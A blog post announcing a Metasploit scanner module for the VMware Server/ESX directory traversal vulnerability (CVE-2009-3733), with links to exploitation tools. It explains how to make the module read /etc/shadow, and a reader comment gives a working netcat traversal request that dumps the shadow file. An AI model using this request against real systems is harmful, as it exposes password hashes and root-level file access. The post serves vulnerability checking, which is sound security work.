Since everyone else is releasing code to check for/exploit the vmware server/esx/esxi directory traversal vulnerability I pushed up my checker module to the metasploit trunk as an auxiliary scanner module.
If you want to just download a full guest host check out:
GuestStealer -- http://www.fyrmassociates.com/tools/gueststealer-v1.1.pl
or the
nmap script -- http://www.skullsecurity.org/blog/?p=436
I don't feel like re-implementing it and I for sure don't want anything ever auto-downloading several gigabytes of information for me, so if you want that functionality write it or use the above tools. Gueststealer works great.
Vulnerability References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3733
http://www.vmware.com/security/advisories/VMSA-2009-0015.html
The module:
The module is simple enough. By default it checks for:
FILE /etc/vmware/hostd/vmInventory.xml
If it receives a 200 to the traversal string and file it says its vulnerable. If you want to see the output of the file you can uncomment the following line from the code:
#print_status("Output Of Requested File:\n#{res.body}")
reload the module, then change the file to what you want (example: set FILE /etc/shadow).
Since VMWare runs as root you pretty much have access to anything on the file system.
Thanks,
ReplyDeleteWorking great against VMWare Server version 2.0.1 on my local machine.
I tried simply using netcat
#nc -vv -n 127.0.0.1 8222
GET /sdk/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/shadow
and it spitted out my shadow file.
Just curious to know how you remain so much "updated" with metasploit :)